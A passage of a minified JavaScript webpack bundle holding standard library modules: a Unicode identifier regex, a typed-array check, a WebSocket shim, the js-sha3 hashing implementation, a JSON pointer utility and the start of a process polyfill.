e-\u0c90\u0c92-\u0ca8\u0caa-\u0cb3\u0cb5-\u0cb9\u0cbd\u0cde\u0ce0\u0ce1\u0cf1\u0cf2\u0d05-\u0d0c\u0d0e-\u0d10\u0d12-\u0d3a\u0d3d\u0d4e\u0d60\u0d61\u0d7a-\u0d7f\u0d85-\u0d96\u0d9a-\u0db1\u0db3-\u0dbb\u0dbd\u0dc0-\u0dc6\u0e01-\u0e30\u0e32\u0e33\u0e40-\u0e46\u0e81\u0e82\u0e84\u0e87\u0e88\u0e8a\u0e8d\u0e94-\u0e97\u0e99-\u0e9f\u0ea1-\u0ea3\u0ea5\u0ea7\u0eaa\u0eab\u0ead-\u0eb0\u0eb2\u0eb3\u0ebd\u0ec0-\u0ec4\u0ec6\u0edc-\u0edf\u0f00\u0f40-\u0f47\u0f49-\u0f6c\u0f88-\u0f8c\u1000-\u102a\u103f\u1050-\u1055\u105a-\u105d\u1061\u1065\u1066\u106e-\u1070\u1075-\u1081\u108e\u10a0-\u10c5\u10c7\u10cd\u10d0-\u10fa\u10fc-\u1248\u124a-\u124d\u1250-\u1256\u1258\u125a-\u125d\u1260-\u1288\u128a-\u128d\u1290-\u12b0\u12b2-\u12b5\u12b8-\u12be\u12c0\u12c2-\u12c5\u12c8-\u12d6\u12d8-\u1310\u1312-\u1315\u1318-\u135a\u1380-\u138f\u13a0-\u13f4\u1401-\u166c\u166f-\u167f\u1681-\u169a\u16a0-\u16ea\u16ee-\u16f0\u1700-\u170c\u170e-\u1711\u1720-\u1731\u1740-\u1751\u1760-\u176c\u176e-\u1770\u1780-\u17b3\u17d7\u17dc\u1820-\u1877\u1880-\u18a8\u18aa\u18b0-\u18f5\u1900-\u191c\u1950-\u196d\u1970-\u1974\u1980-\u19ab\u19c1-\u19c7\u1a00-\u1a16\u1a20-\u1a54\u1aa7\u1b05-\u1b33\u1b45-\u1b4b\u1b83-\u1ba0\u1bae\u1baf\u1bba-\u1be5\u1c00-\u1c23\u1c4d-\u1c4f\u1c5a-\u1c7d\u1ce9-\u1cec\u1cee-\u1cf1\u1cf5\u1cf6\u1d00-\u1dbf\u1e00-\u1f15\u1f18-\u1f1d\u1f20-\u1f45\u1f48-\u1f4d\u1f50-\u1f57\u1f59\u1f5b\u1f5d\u1f5f-\u1f7d\u1f80-\u1fb4\u1fb6-\u1fbc\u1fbe\u1fc2-\u1fc4\u1fc6-\u1fcc\u1fd0-\u1fd3\u1fd6-\u1fdb\u1fe0-\u1fec\u1ff2-\u1ff4\u1ff6-\u1ffc\u2071\u207f\u2090-\u209c\u2102\u2107\u210a-\u2113\u2115\u2119-\u211d\u2124\u2126\u2128\u212a-\u212d\u212f-\u2139\u213c-\u213f\u2145-\u2149\u214e\u2160-\u2188\u2c00-\u2c2e\u2c30-\u2c5e\u2c60-\u2ce4\u2ceb-\u2cee\u2cf2\u2cf3\u2d00-\u2d25\u2d27\u2d2d\u2d30-\u2d67\u2d6f\u2d80-\u2d96\u2da0-\u2da6\u2da8-\u2dae\u2db0-\u2db6\u2db8-\u2dbe\u2dc0-\u2dc6\u2dc8-\u2dce\u2dd0-\u2dd6\u2dd8-\u2dde\u2e2f\u3005-\u3007\u3021-\u3029\u3031-\u3035\u3038-\u303c\u3041-\u3096\u309d-\u309f\u30a1-\u30fa\u30fc-\u30ff\u3105-\u312d\u3131-\u318e\u31a0-\u31ba\u31f0-\u31ff\u3400-\u4db5\u4e00-\u9fcc\ua000-\ua48c\ua4d0-\ua4fd\ua500-\ua60c\ua610-\ua61f\ua62a\ua62b\ua640-\ua66e\ua67f-\ua697\ua6a0-\ua6ef\ua717-\ua71f\ua722-\ua788\ua78b-\ua78e\ua790-\ua793\ua7a0-\ua7aa\ua7f8-\ua801\ua803-\ua805\ua807-\ua80a\ua80c-\ua822\ua840-\ua873\ua882-\ua8b3\ua8f2-\ua8f7\ua8fb\ua90a-\ua925\ua930-\ua946\ua960-\ua97c\ua984-\ua9b2\ua9cf\uaa00-\uaa28\uaa40-\uaa42\uaa44-\uaa4b\uaa60-\uaa76\uaa7a\uaa80-\uaaaf\uaab1\uaab5\uaab6\uaab9-\uaabd\uaac0\uaac2\uaadb-\uaadd\uaae0-\uaaea\uaaf2-\uaaf4\uab01-\uab06\uab09-\uab0e\uab11-\uab16\uab20-\uab26\uab28-\uab2e\uabc0-\uabe2\uac00-\ud7a3\ud7b0-\ud7c6\ud7cb-\ud7fb\uf900-\ufa6d\ufa70-\ufad9\ufb00-\ufb06\ufb13-\ufb17\ufb1d\ufb1f-\ufb28\ufb2a-\ufb36\ufb38-\ufb3c\ufb3e\ufb40\ufb41\ufb43\ufb44\ufb46-\ufbb1\ufbd3-\ufd3d\ufd50-\ufd8f\ufd92-\ufdc7\ufdf0-\ufdfb\ufe70-\ufe74\ufe76-\ufefc\uff21-\uff3a\uff41-\uff5a\uff66-\uffbe\uffc2-\uffc7\uffca-\uffcf\uffd2-\uffd7\uffda-\uffdc0-9\u0300-\u036f\u0483-\u0487\u0591-\u05bd\u05bf\u05c1\u05c2\u05c4\u05c5\u05c7\u0610-\u061a\u064b-\u0669\u0670\u06d6-\u06dc\u06df-\u06e4\u06e7\u06e8\u06ea-\u06ed\u06f0-\u06f9\u0711\u0730-\u074a\u07a6-\u07b0\u07c0-\u07c9\u07eb-\u07f3\u0816-\u0819\u081b-\u0823\u0825-\u0827\u0829-\u082d\u0859-\u085b\u08e4-\u08fe\u0900-\u0903\u093a-\u093c\u093e-\u094f\u0951-\u0957\u0962\u0963\u0966-\u096f\u0981-\u0983\u09bc\u09be-\u09c4\u09c7\u09c8\u09cb-\u09cd\u09d7\u09e2\u09e3\u09e6-\u09ef\u0a01-\u0a03\u0a3c\u0a3e-\u0a42\u0a47\u0a48\u0a4b-\u0a4d\u0a51\u0a66-\u0a71\u0a75\u0a81-\u0a83\u0abc\u0abe-\u0ac5\u0ac7-\u0ac9\u0acb-\u0acd\u0ae2\u0ae3\u0ae6-\u0aef\u0b01-\u0b03\u0b3c\u0b3e-\u0b44\u0b47\u0b48\u0b4b-\u0b4d\u0b56\u0b57\u0b62\u0b63\u0b66-\u0b6f\u0b82\u0bbe-\u0bc2\u0bc6-\u0bc8\u0bca-\u0bcd\u0bd7\u0be6-\u0bef\u0c01-\u0c03\u0c3e-\u0c44\u0c46-\u0c48\u0c4a-\u0c4d\u0c55\u0c56\u0c62\u0c63\u0c66-\u0c6f\u0c82\u0c83\u0cbc\u0cbe-\u0cc4\u0cc6-\u0cc8\u0cca-\u0ccd\u0cd5\u0cd6\u0ce2\u0ce3\u0ce6-\u0cef\u0d02\u0d03\u0d3e-\u0d44\u0d46-\u0d48\u0d4a-\u0d4d\u0d57\u0d62\u0d63\u0d66-\u0d6f\u0d82\u0d83\u0dca\u0dcf-\u0dd4\u0dd6\u0dd8-\u0ddf\u0df2\u0df3\u0e31\u0e34-\u0e3a\u0e47-\u0e4e\u0e50-\u0e59\u0eb1\u0eb4-\u0eb9\u0ebb\u0ebc\u0ec8-\u0ecd\u0ed0-\u0ed9\u0f18\u0f19\u0f20-\u0f29\u0f35\u0f37\u0f39\u0f3e\u0f3f\u0f71-\u0f84\u0f86\u0f87\u0f8d-\u0f97\u0f99-\u0fbc\u0fc6\u102b-\u103e\u1040-\u1049\u1056-\u1059\u105e-\u1060\u1062-\u1064\u1067-\u106d\u1071-\u1074\u1082-\u108d\u108f-\u109d\u135d-\u135f\u1712-\u1714\u1732-\u1734\u1752\u1753\u1772\u1773\u17b4-\u17d3\u17dd\u17e0-\u17e9\u180b-\u180d\u1810-\u1819\u18a9\u1920-\u192b\u1930-\u193b\u1946-\u194f\u19b0-\u19c0\u19c8\u19c9\u19d0-\u19d9\u1a17-\u1a1b\u1a55-\u1a5e\u1a60-\u1a7c\u1a7f-\u1a89\u1a90-\u1a99\u1b00-\u1b04\u1b34-\u1b44\u1b50-\u1b59\u1b6b-\u1b73\u1b80-\u1b82\u1ba1-\u1bad\u1bb0-\u1bb9\u1be6-\u1bf3\u1c24-\u1c37\u1c40-\u1c49\u1c50-\u1c59\u1cd0-\u1cd2\u1cd4-\u1ce8\u1ced\u1cf2-\u1cf4\u1dc0-\u1de6\u1dfc-\u1dff\u200c\u200d\u203f\u2040\u2054\u20d0-\u20dc\u20e1\u20e5-\u20f0\u2cef-\u2cf1\u2d7f\u2de0-\u2dff\u302a-\u302f\u3099\u309a\ua620-\ua629\ua66f\ua674-\ua67d\ua69f\ua6f0\ua6f1\ua802\ua806\ua80b\ua823-\ua827\ua880\ua881\ua8b4-\ua8c4\ua8d0-\ua8d9\ua8e0-\ua8f1\ua900-\ua909\ua926-\ua92d\ua947-\ua953\ua980-\ua983\ua9b3-\ua9c0\ua9d0-\ua9d9\uaa29-\uaa36\uaa43\uaa4c\uaa4d\uaa50-\uaa59\uaa7b\uaab0\uaab2-\uaab4\uaab7\uaab8\uaabe\uaabf\uaac1\uaaeb-\uaaef\uaaf5\uaaf6\uabe3-\uabea\uabec\uabed\uabf0-\uabf9\ufb1e\ufe00-\ufe0f\ufe20-\ufe26\ufe33\ufe34\ufe4d-\ufe4f\uff10-\uff19\uff3f]*$/.test(e);
                };
            },
            198: (e, t, r)=>{
                "use strict";
                var n = r(3243), i = r(2191), o = r(2680), s = o("Object.prototype.toString"), a = r(7226)(), u = "undefined" == typeof globalThis ? r.g : globalThis, c = i(), l = o("Array.prototype.indexOf", !0) || function(e, t) {
                    for(var r = 0; r < e.length; r += 1)if (e[r] === t) return r;
                    return -1;
                }, d = o("String.prototype.slice"), h = {}, f = r(9765), p = Object.getPrototypeOf;
                a && f && p && n(c, function(e) {
                    var t = new u[e];
                    if (Symbol.toStringTag in t) {
                        var r = p(t), n = f(r, Symbol.toStringTag);
                        if (!n) {
                            var i = p(r);
                            n = f(i, Symbol.toStringTag);
                        }
                        h[e] = n.get;
                    }
                }), e.exports = function(e) {
                    if (!e || "object" != typeof e) return !1;
                    if (!a || !(Symbol.toStringTag in e)) {
                        var t = d(s(e), 8, -1);
                        return l(c, t) > -1;
                    }
                    return !!f && function(e) {
                        var t = !1;
                        return n(h, function(r, n) {
                            if (!t) try {
                                t = r.call(e) === n;
                            } catch (e) {}
                        }), t;
                    }(e);
                };
            },
            7475: (e, t, r)=>{
                "use strict";
                r.r(t), r.d(t, {
                    default: ()=>i
                });
                var n = null;
                "undefined" != typeof WebSocket ? n = WebSocket : "undefined" != typeof MozWebSocket ? n = MozWebSocket : void 0 !== r.g ? n = r.g.WebSocket || r.g.MozWebSocket : "undefined" != typeof window ? n = window.WebSocket || window.MozWebSocket : "undefined" != typeof self && (n = self.WebSocket || self.MozWebSocket);
                const i = n;
            },
            3669: (e, t, r)=>{
                var n, i = r(4406);
                !function() {
                    "use strict";
                    var o = "input is invalid type", s = "object" == typeof window, a = s ? window : {};
                    a.JS_SHA3_NO_WINDOW && (s = !1);
                    var u = !s && "object" == typeof self;
                    !a.JS_SHA3_NO_NODE_JS && "object" == typeof i && i.versions && i.versions.node ? a = r.g : u && (a = self);
                    var c = !a.JS_SHA3_NO_COMMON_JS && e.exports, l = r.amdO, d = !a.JS_SHA3_NO_ARRAY_BUFFER && "undefined" != typeof ArrayBuffer, h = "0123456789abcdef".split(""), f = [
                        4,
                        1024,
                        262144,
                        67108864
                    ], p = [
                        0,
                        8,
                        16,
                        24
                    ], m = [
                        1,
                        0,
                        32898,
                        0,
                        32906,
                        2147483648,
                        2147516416,
                        2147483648,
                        32907,
                        0,
                        2147483649,
                        0,
                        2147516545,
                        2147483648,
                        32777,
                        2147483648,
                        138,
                        0,
                        136,
                        0,
                        2147516425,
                        0,
                        2147483658,
                        0,
                        2147516555,
                        0,
                        139,
                        2147483648,
                        32905,
                        2147483648,
                        32771,
                        2147483648,
                        32770,
                        2147483648,
                        128,
                        2147483648,
                        32778,
                        0,
                        2147483658,
                        2147483648,
                        2147516545,
                        2147483648,
                        32896,
                        2147483648,
                        2147483649,
                        0,
                        2147516424,
                        2147483648
                    ], g = [
                        224,
                        256,
                        384,
                        512
                    ], y = [
                        128,
                        256
                    ], v = [
                        "hex",
                        "buffer",
                        "arrayBuffer",
                        "array",
                        "digest"
                    ], b = {
                        128: 168,
                        256: 136
                    };
                    !a.JS_SHA3_NO_NODE_JS && Array.isArray || (Array.isArray = function(e) {
                        return "[object Array]" === Object.prototype.toString.call(e);
                    }), !d || !a.JS_SHA3_NO_ARRAY_BUFFER_IS_VIEW && ArrayBuffer.isView || (ArrayBuffer.isView = function(e) {
                        return "object" == typeof e && e.buffer && e.buffer.constructor === ArrayBuffer;
                    });
                    for(var E = function(e, t, r) {
                        return function(n) {
                            return new k(e, t, e).update(n)[r]();
                        };
                    }, A = function(e, t, r) {
                        return function(n, i) {
                            return new k(e, t, i).update(n)[r]();
                        };
                    }, _ = function(e, t, r) {
                        return function(t, n, i, o) {
                            return S["cshake" + e].update(t, n, i, o)[r]();
                        };
                    }, w = function(e, t, r) {
                        return function(t, n, i, o) {
                            return S["kmac" + e].update(t, n, i, o)[r]();
                        };
                    }, T = function(e, t, r, n) {
                        for(var i = 0; i < v.length; ++i){
                            var o = v[i];
                            e[o] = t(r, n, o);
                        }
                        return e;
                    }, R = function(e, t) {
                        var r = E(e, t, "hex");
                        return r.create = function() {
                            return new k(e, t, e);
                        }, r.update = function(e) {
                            return r.create().update(e);
                        }, T(r, E, e, t);
                    }, I = [
                        {
                            name: "keccak",
                            padding: [
                                1,
                                256,
                                65536,
                                16777216
                            ],
                            bits: g,
                            createMethod: R
                        },
                        {
                            name: "sha3",
                            padding: [
                                6,
                                1536,
                                393216,
                                100663296
                            ],
                            bits: g,
                            createMethod: R
                        },
                        {
                            name: "shake",
                            padding: [
                                31,
                                7936,
                                2031616,
                                520093696
                            ],
                            bits: y,
                            createMethod: function(e, t) {
                                var r = A(e, t, "hex");
                                return r.create = function(r) {
                                    return new k(e, t, r);
                                }, r.update = function(e, t) {
                                    return r.create(t).update(e);
                                }, T(r, A, e, t);
                            }
                        },
                        {
                            name: "cshake",
                            padding: f,
                            bits: y,
                            createMethod: function(e, t) {
                                var r = b[e], n = _(e, 0, "hex");
                                return n.create = function(n, i, o) {
                                    return i || o ? new k(e, t, n).bytepad([
                                        i,
                                        o
                                    ], r) : S["shake" + e].create(n);
                                }, n.update = function(e, t, r, i) {
                                    return n.create(t, r, i).update(e);
                                }, T(n, _, e, t);
                            }
                        },
                        {
                            name: "kmac",
                            padding: f,
                            bits: y,
                            createMethod: function(e, t) {
                                var r = b[e], n = w(e, 0, "hex");
                                return n.create = function(n, i, o) {
                                    return new L(e, t, i).bytepad([
                                        "KMAC",
                                        o
                                    ], r).bytepad([
                                        n
                                    ], r);
                                }, n.update = function(e, t, r, i) {
                                    return n.create(e, r, i).update(t);
                                }, T(n, w, e, t);
                            }
                        }
                    ], S = {}, P = [], O = 0; O < I.length; ++O)for(var x = I[O], M = x.bits, B = 0; B < M.length; ++B){
                        var N = x.name + "_" + M[B];
                        if (P.push(N), S[N] = x.createMethod(M[B], x.padding), "sha3" !== x.name) {
                            var C = x.name + M[B];
                            P.push(C), S[C] = S[N];
                        }
                    }
                    function k(e, t, r) {
                        this.blocks = [], this.s = [], this.padding = t, this.outputBits = r, this.reset = !0, this.finalized = !1, this.block = 0, this.start = 0, this.blockCount = 1600 - (e << 1) >> 5, this.byteCount = this.blockCount << 2, this.outputBlocks = r >> 5, this.extraBytes = (31 & r) >> 3;
                        for(var n = 0; n < 50; ++n)this.s[n] = 0;
                    }
                    function L(e, t, r) {
                        k.call(this, e, t, r);
                    }
                    k.prototype.update = function(e) {
                        if (this.finalized) throw new Error("finalize already called");
                        var t, r = typeof e;
                        if ("string" !== r) {
                            if ("object" !== r) throw new Error(o);
                            if (null === e) throw new Error(o);
                            if (d && e.constructor === ArrayBuffer) e = new Uint8Array(e);
                            else if (!(Array.isArray(e) || d && ArrayBuffer.isView(e))) throw new Error(o);
                            t = !0;
                        }
                        for(var n, i, s = this.blocks, a = this.byteCount, u = e.length, c = this.blockCount, l = 0, h = this.s; l < u;){
                            if (this.reset) for(this.reset = !1, s[0] = this.block, n = 1; n < c + 1; ++n)s[n] = 0;
                            if (t) for(n = this.start; l < u && n < a; ++l)s[n >> 2] |= e[l] << p[3 & n++];
                            else for(n = this.start; l < u && n < a; ++l)(i = e.charCodeAt(l)) < 128 ? s[n >> 2] |= i << p[3 & n++] : i < 2048 ? (s[n >> 2] |= (192 | i >> 6) << p[3 & n++], s[n >> 2] |= (128 | 63 & i) << p[3 & n++]) : i < 55296 || i >= 57344 ? (s[n >> 2] |= (224 | i >> 12) << p[3 & n++], s[n >> 2] |= (128 | i >> 6 & 63) << p[3 & n++], s[n >> 2] |= (128 | 63 & i) << p[3 & n++]) : (i = 65536 + ((1023 & i) << 10 | 1023 & e.charCodeAt(++l)), s[n >> 2] |= (240 | i >> 18) << p[3 & n++], s[n >> 2] |= (128 | i >> 12 & 63) << p[3 & n++], s[n >> 2] |= (128 | i >> 6 & 63) << p[3 & n++], s[n >> 2] |= (128 | 63 & i) << p[3 & n++]);
                            if (this.lastByteIndex = n, n >= a) {
                                for(this.start = n - a, this.block = s[c], n = 0; n < c; ++n)h[n] ^= s[n];
                                F(h), this.reset = !0;
                            } else this.start = n;
                        }
                        return this;
                    }, k.prototype.encode = function(e, t) {
                        var r = 255 & e, n = 1, i = [
                            r
                        ];
                        for(r = 255 & (e >>= 8); r > 0;)i.unshift(r), r = 255 & (e >>= 8), ++n;
                        return t ? i.push(n) : i.unshift(n), this.update(i), i.length;
                    }, k.prototype.encodeString = function(e) {
                        var t, r = typeof e;
                        if ("string" !== r) {
                            if ("object" !== r) throw new Error(o);
                            if (null === e) throw new Error(o);
                            if (d && e.constructor === ArrayBuffer) e = new Uint8Array(e);
                            else if (!(Array.isArray(e) || d && ArrayBuffer.isView(e))) throw new Error(o);
                            t = !0;
                        }
                        var n = 0, i = e.length;
                        if (t) n = i;
                        else for(var s = 0; s < e.length; ++s){
                            var a = e.charCodeAt(s);
                            a < 128 ? n += 1 : a < 2048 ? n += 2 : a < 55296 || a >= 57344 ? n += 3 : (a = 65536 + ((1023 & a) << 10 | 1023 & e.charCodeAt(++s)), n += 4);
                        }
                        return n += this.encode(8 * n), this.update(e), n;
                    }, k.prototype.bytepad = function(e, t) {
                        for(var r = this.encode(t), n = 0; n < e.length; ++n)r += this.encodeString(e[n]);
                        var i = t - r % t, o = [];
                        return o.length = i, this.update(o), this;
                    }, k.prototype.finalize = function() {
                        if (!this.finalized) {
                            this.finalized = !0;
                            var e = this.blocks, t = this.lastByteIndex, r = this.blockCount, n = this.s;
                            if (e[t >> 2] |= this.padding[3 & t], this.lastByteIndex === this.byteCount) for(e[0] = e[r], t = 1; t < r + 1; ++t)e[t] = 0;
                            for(e[r - 1] |= 2147483648, t = 0; t < r; ++t)n[t] ^= e[t];
                            F(n);
                        }
                    }, k.prototype.toString = k.prototype.hex = function() {
                        this.finalize();
                        for(var e, t = this.blockCount, r = this.s, n = this.outputBlocks, i = this.extraBytes, o = 0, s = 0, a = ""; s < n;){
                            for(o = 0; o < t && s < n; ++o, ++s)e = r[o], a += h[e >> 4 & 15] + h[15 & e] + h[e >> 12 & 15] + h[e >> 8 & 15] + h[e >> 20 & 15] + h[e >> 16 & 15] + h[e >> 28 & 15] + h[e >> 24 & 15];
                            s % t == 0 && (F(r), o = 0);
                        }
                        return i && (e = r[o], a += h[e >> 4 & 15] + h[15 & e], i > 1 && (a += h[e >> 12 & 15] + h[e >> 8 & 15]), i > 2 && (a += h[e >> 20 & 15] + h[e >> 16 & 15])), a;
                    }, k.prototype.arrayBuffer = function() {
                        this.finalize();
                        var e, t = this.blockCount, r = this.s, n = this.outputBlocks, i = this.extraBytes, o = 0, s = 0, a = this.outputBits >> 3;
                        e = i ? new ArrayBuffer(n + 1 << 2) : new ArrayBuffer(a);
                        for(var u = new Uint32Array(e); s < n;){
                            for(o = 0; o < t && s < n; ++o, ++s)u[s] = r[o];
                            s % t == 0 && F(r);
                        }
                        return i && (u[o] = r[o], e = e.slice(0, a)), e;
                    }, k.prototype.buffer = k.prototype.arrayBuffer, k.prototype.digest = k.prototype.array = function() {
                        this.finalize();
                        for(var e, t, r = this.blockCount, n = this.s, i = this.outputBlocks, o = this.extraBytes, s = 0, a = 0, u = []; a < i;){
                            for(s = 0; s < r && a < i; ++s, ++a)e = a << 2, t = n[s], u[e] = 255 & t, u[e + 1] = t >> 8 & 255, u[e + 2] = t >> 16 & 255, u[e + 3] = t >> 24 & 255;
                            a % r == 0 && F(n);
                        }
                        return o && (e = a << 2, t = n[s], u[e] = 255 & t, o > 1 && (u[e + 1] = t >> 8 & 255), o > 2 && (u[e + 2] = t >> 16 & 255)), u;
                    }, L.prototype = new k, L.prototype.finalize = function() {
                        return this.encode(this.outputBits, !0), k.prototype.finalize.call(this);
                    };
                    var F = function(e) {
                        var t, r, n, i, o, s, a, u, c, l, d, h, f, p, g, y, v, b, E, A, _, w, T, R, I, S, P, O, x, M, B, N, C, k, L, F, D, j, U, H, G, V, W, q, z, Q, K, J, X, Y, Z, $, ee, te, re, ne, ie, oe, se, ae, ue, ce, le;
                        for(n = 0; n < 48; n += 2)i = e[0] ^ e[10] ^ e[20] ^ e[30] ^ e[40], o = e[1] ^ e[11] ^ e[21] ^ e[31] ^ e[41], s = e[2] ^ e[12] ^ e[22] ^ e[32] ^ e[42], a = e[3] ^ e[13] ^ e[23] ^ e[33] ^ e[43], u = e[4] ^ e[14] ^ e[24] ^ e[34] ^ e[44], c = e[5] ^ e[15] ^ e[25] ^ e[35] ^ e[45], l = e[6] ^ e[16] ^ e[26] ^ e[36] ^ e[46], d = e[7] ^ e[17] ^ e[27] ^ e[37] ^ e[47], t = (h = e[8] ^ e[18] ^ e[28] ^ e[38] ^ e[48]) ^ (s << 1 | a >>> 31), r = (f = e[9] ^ e[19] ^ e[29] ^ e[39] ^ e[49]) ^ (a << 1 | s >>> 31), e[0] ^= t, e[1] ^= r, e[10] ^= t, e[11] ^= r, e[20] ^= t, e[21] ^= r, e[30] ^= t, e[31] ^= r, e[40] ^= t, e[41] ^= r, t = i ^ (u << 1 | c >>> 31), r = o ^ (c << 1 | u >>> 31), e[2] ^= t, e[3] ^= r, e[12] ^= t, e[13] ^= r, e[22] ^= t, e[23] ^= r, e[32] ^= t, e[33] ^= r, e[42] ^= t, e[43] ^= r, t = s ^ (l << 1 | d >>> 31), r = a ^ (d << 1 | l >>> 31), e[4] ^= t, e[5] ^= r, e[14] ^= t, e[15] ^= r, e[24] ^= t, e[25] ^= r, e[34] ^= t, e[35] ^= r, e[44] ^= t, e[45] ^= r, t = u ^ (h << 1 | f >>> 31), r = c ^ (f << 1 | h >>> 31), e[6] ^= t, e[7] ^= r, e[16] ^= t, e[17] ^= r, e[26] ^= t, e[27] ^= r, e[36] ^= t, e[37] ^= r, e[46] ^= t, e[47] ^= r, t = l ^ (i << 1 | o >>> 31), r = d ^ (o << 1 | i >>> 31), e[8] ^= t, e[9] ^= r, e[18] ^= t, e[19] ^= r, e[28] ^= t, e[29] ^= r, e[38] ^= t, e[39] ^= r, e[48] ^= t, e[49] ^= r, p = e[0], g = e[1], Q = e[11] << 4 | e[10] >>> 28, K = e[10] << 4 | e[11] >>> 28, O = e[20] << 3 | e[21] >>> 29, x = e[21] << 3 | e[20] >>> 29, ae = e[31] << 9 | e[30] >>> 23, ue = e[30] << 9 | e[31] >>> 23, V = e[40] << 18 | e[41] >>> 14, W = e[41] << 18 | e[40] >>> 14, k = e[2] << 1 | e[3] >>> 31, L = e[3] << 1 | e[2] >>> 31, y = e[13] << 12 | e[12] >>> 20, v = e[12] << 12 | e[13] >>> 20, J = e[22] << 10 | e[23] >>> 22, X = e[23] << 10 | e[22] >>> 22, M = e[33] << 13 | e[32] >>> 19, B = e[32] << 13 | e[33] >>> 19, ce = e[42] << 2 | e[43] >>> 30, le = e[43] << 2 | e[42] >>> 30, te = e[5] << 30 | e[4] >>> 2, re = e[4] << 30 | e[5] >>> 2, F = e[14] << 6 | e[15] >>> 26, D = e[15] << 6 | e[14] >>> 26, b = e[25] << 11 | e[24] >>> 21, E = e[24] << 11 | e[25] >>> 21, Y = e[34] << 15 | e[35] >>> 17, Z = e[35] << 15 | e[34] >>> 17, N = e[45] << 29 | e[44] >>> 3, C = e[44] << 29 | e[45] >>> 3, R = e[6] << 28 | e[7] >>> 4, I = e[7] << 28 | e[6] >>> 4, ne = e[17] << 23 | e[16] >>> 9, ie = e[16] << 23 | e[17] >>> 9, j = e[26] << 25 | e[27] >>> 7, U = e[27] << 25 | e[26] >>> 7, A = e[36] << 21 | e[37] >>> 11, _ = e[37] << 21 | e[36] >>> 11, $ = e[47] << 24 | e[46] >>> 8, ee = e[46] << 24 | e[47] >>> 8, q = e[8] << 27 | e[9] >>> 5, z = e[9] << 27 | e[8] >>> 5, S = e[18] << 20 | e[19] >>> 12, P = e[19] << 20 | e[18] >>> 12, oe = e[29] << 7 | e[28] >>> 25, se = e[28] << 7 | e[29] >>> 25, H = e[38] << 8 | e[39] >>> 24, G = e[39] << 8 | e[38] >>> 24, w = e[48] << 14 | e[49] >>> 18, T = e[49] << 14 | e[48] >>> 18, e[0] = p ^ ~y & b, e[1] = g ^ ~v & E, e[10] = R ^ ~S & O, e[11] = I ^ ~P & x, e[20] = k ^ ~F & j, e[21] = L ^ ~D & U, e[30] = q ^ ~Q & J, e[31] = z ^ ~K & X, e[40] = te ^ ~ne & oe, e[41] = re ^ ~ie & se, e[2] = y ^ ~b & A, e[3] = v ^ ~E & _, e[12] = S ^ ~O & M, e[13] = P ^ ~x & B, e[22] = F ^ ~j & H, e[23] = D ^ ~U & G, e[32] = Q ^ ~J & Y, e[33] = K ^ ~X & Z, e[42] = ne ^ ~oe & ae, e[43] = ie ^ ~se & ue, e[4] = b ^ ~A & w, e[5] = E ^ ~_ & T, e[14] = O ^ ~M & N, e[15] = x ^ ~B & C, e[24] = j ^ ~H & V, e[25] = U ^ ~G & W, e[34] = J ^ ~Y & $, e[35] = X ^ ~Z & ee, e[44] = oe ^ ~ae & ce, e[45] = se ^ ~ue & le, e[6] = A ^ ~w & p, e[7] = _ ^ ~T & g, e[16] = M ^ ~N & R, e[17] = B ^ ~C & I, e[26] = H ^ ~V & k, e[27] = G ^ ~W & L, e[36] = Y ^ ~$ & q, e[37] = Z ^ ~ee & z, e[46] = ae ^ ~ce & te, e[47] = ue ^ ~le & re, e[8] = w ^ ~p & y, e[9] = T ^ ~g & v, e[18] = N ^ ~R & S, e[19] = C ^ ~I & P, e[28] = V ^ ~k & F, e[29] = W ^ ~L & D, e[38] = $ ^ ~q & Q, e[39] = ee ^ ~z & K, e[48] = ce ^ ~te & ne, e[49] = le ^ ~re & ie, e[0] ^= m[n], e[1] ^= m[n + 1];
                    };
                    if (c) e.exports = S;
                    else {
                        for(O = 0; O < P.length; ++O)a[P[O]] = S[P[O]];
                        l && (void 0 === (n = (function() {
                            return S;
                        }).call(t, r, t, e)) || (e.exports = n));
                    }
                }();
            },
            404: (e, t)=>{
                var r = /~/, n = /~[01]/g;
                function i(e) {
                    switch(e){
                        case "~1":
                            return "/";
                        case "~0":
                            return "~";
                    }
                    throw new Error("Invalid tilde escape: " + e);
                }
                function o(e) {
                    return r.test(e) ? e.replace(n, i) : e;
                }
                function s(e) {
                    if ("string" == typeof e) {
                        if ("" === (e = e.split("/"))[0]) return e;
                        throw new Error("Invalid JSON pointer.");
                    }
                    if (Array.isArray(e)) {
                        for (const t of e)if ("string" != typeof t && "number" != typeof t) throw new Error("Invalid JSON pointer. Must be of type string or number.");
                        return e;
                    }
                    throw new Error("Invalid JSON pointer.");
                }
                function a(e, t) {
                    if ("object" != typeof e) throw new Error("Invalid input object.");
                    var r = (t = s(t)).length;
                    if (1 === r) return e;
                    for(var n = 1; n < r;){
                        if (e = e[o(t[n++])], r === n) return e;
                        if ("object" != typeof e || null === e) return;
                    }
                }
                function u(e, t, r) {
                    if ("object" != typeof e) throw new Error("Invalid input object.");
                    if (0 === (t = s(t)).length) throw new Error("Invalid JSON pointer for set.");
                    return function(e, t, r) {
                        for(var n, i, s = 1, a = t.length; s < a;){
                            if ("constructor" === t[s] || "prototype" === t[s] || "__proto__" === t[s]) return e;
                            if (n = o(t[s++]), i = a > s, void 0 === e[n] && (Array.isArray(e) && "-" === n && (n = e.length), i && ("" !== t[s] && t[s] < 1 / 0 || "-" === t[s] ? e[n] = [] : e[n] = {})), !i) break;
                            e = e[n];
                        }
                        var u = e[n];
                        return void 0 === r ? delete e[n] : e[n] = r, u;
                    }(e, t, r);
                }
                t.get = a, t.set = u, t.compile = function(e) {
                    var t = s(e);
                    return {
                        get: function(e) {
                            return a(e, t);
                        },
                        set: function(e, r) {
                            return u(e, t, r);
                        }
                    };
                };
            },
            4406: (e)=>{
                var t, r, n = e.exports = {};
                function i() {
                    throw new Error("setTimeout has not been defined");
                }
                function o() {
                    throw new Error("clearTimeout has not been defined");
                }
                function s(e) {
                    if (t === setTimeout) return setTimeout(e, 0);
                    if ((t === i || !t) && setTimeout) return t = setTimeout, setTimeout(e, 0);
                    try {
                        return t(e, 0);
                    } catch (r) {
                        try {
                            return t.call(null, e, 0);
                        } catch (r) {
                            return t.call(this, e, 0);
                        }
                    }
                }
                !function() {
                    try {
                        t = "function" == typeof setTimeout ? setTimeout : i;
                    } catch (e) {
                        t = i;
                    }
                    try {
                        r = "function" == typeof clearTimeout ? clearTimeout : o;
                    } catch (e) {
                        r = o;
                    }
                }();
                var a, u = [], c = !1, l = -1;
                function d() {
                    c && a && (c = !1, a.length ? u = a.concat(u) : l = -1, u.length && h());
                }
                function h() {
                    if (!c) {
                        var e = s(d);
                        c = !0;
                        for(var t = u.length; t;){
